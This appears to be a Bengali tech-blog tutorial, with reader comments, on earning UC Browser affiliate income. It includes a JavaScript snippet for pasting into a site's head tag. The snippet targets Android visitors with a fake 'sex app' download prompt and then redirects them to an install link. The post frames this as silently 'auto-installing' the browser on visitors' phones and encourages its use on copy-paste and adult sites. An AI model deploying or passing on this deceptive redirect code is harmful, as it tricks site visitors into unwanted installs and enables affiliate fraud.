UC ব্রাউজার এর এড ব্যবহার করে Adsense বা Revenuehits এর চেয়ে বেশি ইনকাম করুন নিশ্চিন্ত ভাবে,এন্ড্রইড ব্যবহারকারীদের ফোনে অটো ইন্সটল হয়ে যাবে, আর টাকা পাবেন আপনি

বিসমিল্লাহির রাহমানির রাহিম

আসসালামু আলাইকুম। আশাকরি সবাই ভাল আছেন। আমিও ভালো আছি। আজকে তো জাতীয় ফেসবুক মুক্ত দিবস। অনেকেই জানে না। যাদের আশেপাশে অনেকে জানে না তাদের জানিয়ে দিবো সবাই আশা করি। আজ কিছুদিন যাবত ফটোশপের টিউটোরিয়াল করতে করতে একটু বোরিং অবস্থায় পড়ে গেছি তাই আজ সকলের জন্য অত্যান্ত উপকারী একটি ভিন্ন ধর্মী টিউন লিখছি। সকলেই মনোযোগ সহকারে পড়বেন, আর একটু ধৈর্য সহকারে কাজটা করবেন। আশা করি আল্লাহর রহমতে আপনিও পারবেন ইনশাল্লাহ।

অনেকে Adsense এর সপ্ন দেখে বুড়ো হয়ে যায়, পায় না। হাজার হাজার ডলারের স্বপ্ন দেখেও, এডসেন্স পেলে তা বাস্তবে আয় হয় না। তবে আজ এটা দেখুন।

আপনার সাইট থেকে দিনে যদি ১০০ ইউসি ইন্সটল হয় তাহলে আপনি মিনিমাম ১০ ডলার বা ৭০০ টাকা পাবেন, আর যদি ইউ এস এর থেকে ইনস্টল হয় তাহলে ৫০০০ টাকা মিনিমাম। আমার ৭০০ টাকা হলেই খুশি।

আপনার সাইটে কোনো এড কোড শো করবে না, শুধু এন্ড্রইড ব্যবহারকারীদের ফোনে অটো ইন্সটল হয়ে যাবে আপনার সাইটে ভিজিট করার সাথে সাথে।

প্রথমেই বলে রাখি এড কোড টা পাওয়া এক দুই দিনের ধৈর্যের ব্যাপার। তারপর সারা জীবন আরাম। সামান্য একটু কষ্ট করে পেয়ে যাবেন আপনার সাইটের কাঙ্খিত এড কোড, গুগল এডসেন্স এর জন্য ৬ মাসের ব্লগ বা ইংলিশে টিউন করা বা সাত দিন অপেক্ষা করা লাগবে না। আর আপনাকে এডসেন্স এর মত ব্লক ও মারবে না। নিশ্চিন্তে কপি পেস্ট, এডাল্ট সব কিছু দিয়ে সাইট চালিয়ে যেতে পারবেন, নোপ্রবলেম।

আমরা UC ব্রাউজার পাবলিশ করে আয় করবো, যা অনেক সহজ ও আয় অনেক বেশি। UC Union, এটি বিশ্বের প্রধান নামকরা আলিবাবা গ্রুপের প্রোডাক্ট ইউসি ব্রাউজার পাবলিশিং সাইট। যা গত মাসে বিশ্বের দ্বিতীয় মোবাইল ব্রাউজার হিসেবে স্বীকৃতি পেয়েছে। তাই পাবলিশারদের ইনকাম ও তেমন। আমার অনলাইন জীবনের আয়ের প্রধান উৎস এটি। প্রতিদিন ১০ ডলার করেও আয় করি। আমার এক মাসের কাজের স্ক্রিনশট দেখুন

একেবারে অবহেলার সাথে করেছি, মোট ১৮৮ ডলার বা প্রায় পনেরো হাজার টাকা।

বেশি কথা না বলে কাজের কথায় আসি। প্রথমে http://www.union.ucweb.com এই সাইটে যান। তারপর নিচের ছবির মত Sign Up বাটনে ক্লিক করুন।

তারপর নিচের ছবির মত একটি Sign Up পেজ আসবে, প্রথমে User Name বক্সে একটি ইউনিক ইউসারনেম দিন। ২ নং বক্সে একটি কঠিন Password দিন। যেমন *Rezaul3351, ৩ নং বক্সেও একই পাসওয়ার্ড দিন। তারপর ৪ নং বক্সে Country তে Bangladesh সিলেক্ট করুন। online contact যে কোন একটি সিলেক্ট করুন, যেমন Facebook. তারপর Username যা খুশি তা দিয়ে, ৬ নং বক্সে আপনার বর্তমান ইমেইল এড্রেস টি দিন। তারপর আপনার ফোন নাম্বার দিন ছবির মত করে।

এবার ৮ নাম্বার ধাপে আপনার পরিচিত কারো Username দিন। ব্যাংকে একাউন্ট খুলতে যেমন রেফারেন্স লাগে তেমনি এখানেও। কারো রেফারেনস না পেলে ওই বক্সে rezamusicmedia লিখুন অবশ্যই। ওটা আমার ইউসারনেম। তবে ভুল কোন কিছু লিখবেন না, তাহলে UC আপনার একাউন্ট রিজেক্ট করে দিবে।

এবার ৯ নং চেকবক্সে টিক দিয়ে Sign Up বাটনে ক্লিক করে রেজিস্ট্রেশন সম্পন্ন করুন।

এবার নিচের ছবির মত Submit website app এ ক্লিক করুন।

এবার নতুন যে পেজ আসবে ওখানে Cooperation – Cash, Type- Affiliate সিলেক্ট করুন।

তারপর আপনার সাইটের নাম, তারপর সাইটের এড্রেস, পরিশেষে Category সিলেক্ট করে Continue তে ক্লিক করুন।

তারপরে নিচের মত একটি পেজ আসবে, দুই তিন দিন এর ভেতর আপনার সাইট এপ্প্রুভ হয়ে যাবে।

তারপরে Union.ucweb.com এ লগিন করে নিচের ছবির মত Management এ ক্লিক করুন।

এবার নিচের ছবির মত Campaign List এ ক্লিক করুন। (সাইট এপ্প্রুভ হলে তার পর এই Option টি পাওয়া যাবে।)

(এডাল্ট – নন এডাল্ট সব সাইট এপ্রুভ করে)

এবার নিচের মত পেজ পাবেন, একেবারে নিচের টা UC Browser Mini GP তে ক্লিক করুন।

নিচের ছবির মত এড কোড টি কপি করুন।

 

তারপর  এই সাইটে যাবেন- goo ডট gl তারপর নিচের ছবির মত কোড গুলো পেস্ট করে URL Shorten করুন

নিচের ছবিতে দেখানো কোড গুলো কপি করুন।

এবার আমার এই কোড গুলো নিয়ে নোটপ্যাডে রাখুন এবং আমার শর্ট URL চেঞ্জ করে আপনার টা পেস্ট করুন।

<script type="text/javascript">
if(/Android/i.test(navigator.userAgent)) {
var url=confirm("Press Ok To Download Katrina Salman Sex App 0.9 Mb Only");
if (url==true)
{
var url = window.location.href = 'আপনার এড কোড';
url.show();
}
else
{

}
}
</script>

ফাইনালি কোড গুলো সব কপি করে ফেলবো...।

যার যার ওয়েবসাইট, ব্লগ, ওয়াপকা, Xtgem, Sextgm, WordPress ইত্যাদি সাইটের হেড ট্যাগের নিচে পেস্ট করে দিন নিচের ছবির মত করে।

 

ফাইনালি Save করে, মনের আনন্দে সাইটে ভিজিটর দিন। কারন আপনার সাইটে কোনো এড কোড শো করবে না, শুধু এন্ড্রইড ব্যবহারকারীদের ফোনে অটো ইন্সটল হয়ে যাবে আপনার সাইটে ভিজিট করার সাথে সাথে।

এই এডের পাশাপাশি অন্যান্য এড ইউস করতে পারবেন নিশ্চিন্তে। যেমন আমি Revenuehits সাইটের এড ব্যবহার করি। UC থেকে ১০ + Revenuehits থেকে ১০। প্রতিদিন ২০ ডলার আয় করি নিশ্চিন্তে। আরো ভিজিটর বাড়াচ্ছি, দিনে 50$ ইনকামের টারগেট নিয়েছি। নিচে আমার রিসেন্ট অল্প কিছু দিনের ইনকাম দেখুন।

ইউসির পাশাপাশি যেকোনো এড, ব্যানার ব্যবহার করতে পারবেন। ডাবল ইনকাম।

আসলে সম্পূর্ণ ফরমুলাটা আমার নিজের টেকনিকে করা, যা গুগল এডসেন্স এর চেয়ে বহু গুনে ভালো, এবং ইনকাম ও ভালো।

এখানে অনেকে বলতে পারে এডসেন্স দিয়া দিনে ১০০ ডলার করা যায়, আমি বলবো, ভাই মুখে বলা সহজ, কিন্তু করা অনেক কঠিন,

এই এড কোড সাইটে দিলে এবং ভালো এস ই ও করে  ভিজিটর দিলে দিনে ১০০ ডলার কিছুই না।

পুরো এক দিন ধরে টিউটোরিয়াল টা বানানো, ভিডিও টিউটোরিয়াল আসতেছে... এর জন্য আমার ইউটিউব চ্যানেলে সাবস্ক্রাইব দিয়ে রাখতে পারেন।

আর আমার জন্য সবাই দোয়া করবেন, আমি যেনো জীবনে সফলতা নিয়ে বাচতে পারি। আর আমি ও আপনাদের জন্য প্রান খুলে দোয়া করবো। আজকের মত সবাইকে বিদায় জানাচ্ছি।। আসসালামুআলাইকুম।

আমার সাথে যোগাযোগ

Website : BDmovienews.Com

Facebook : Click Here To ADD

Twitter : Click Here To Follow

Google Plus : Click Here to +Plus add me

Skype : rezaulislamrezaa and Youtube Channel

আমার অন্যান্য টিউন গুলো যারা মিস করেছেন-

  1. ফটোশপ দিয়ে আপনার মুখে রঙ কালি ছাড়া বাংলাদেশ, ব্রাজিল বা আরজেন্টিনার বা অন্যান্য সব দেশের পতাকা পেইন্ট করু
  2. খুব সহজেই তৈরী করে ফেলুন অসাম 3D স্টাইলের একটি সুন্দর লোগো, মিস করলেই ল
  3. তৈরী করে ফেলুন একটি আপনার ওয়েবসাইট বা কোম্পানীর জন্য আরো একটি সুন্দর লোগো, একেবারে বেকাইদা
  4. ফটোশপের মাধ্যমে চমৎকার সব Flyer ডিজাইন করুন, এবং শিখুন – সফল গ্রাফিক্স ডিজাইনার হোন
  5. মারাত্মক সুন্দর একটা বিজনেস কার্ড ডিজাইন করুন মাত্র ৯ মিনিট সময়ে – ফটোশপ ফাটাফাটি টিউটোরিয়াল

Level New

আমি রেজাউল ইসলাম। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 9 বছর 6 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 8 টি টিউন ও 9 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 0 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।

Working as a professional graphic designer. I am a freelancer about 7 years experience. Also a Google ad-sense publisher. I always want to know something and try to publish my knowledge everyone.


টিউনস


আরও টিউনস


টিউনারের আরও টিউনস


টিউমেন্টস

403 Forbidden

You don’t have permission to access the URL on this server.

অনলাইন থেকে ছোট ছোট কাজ করে ইনকাম করুন http://bit.ly/1LLIvHP

Level 0

osthir

Level 0

ভাই পোস্ট টা ত অনেক সুন্দর হইছে কিন্তু ভাইয়া যে সাইট টা দিয়েছেন সেখানে ত ঢোকা যাচ্ছে না- 403 Forbidden

You don’t have permission to access the URL on this server….।। এই লেখা টা আসে ।

আমি অ্যাকাউন্ট করেছি এবং আমার সাইট এপ্প্রুভ হইসে এখন কি করব?

এই লিংকে যান,এইটা কাজ করবে।
http://www.uc-union.com

এখানে সব বুজলাম পেমেন্ট এর বিষয় নাই ত পেমেন্ট কি ভাবে নিব https://ikhlas24.com/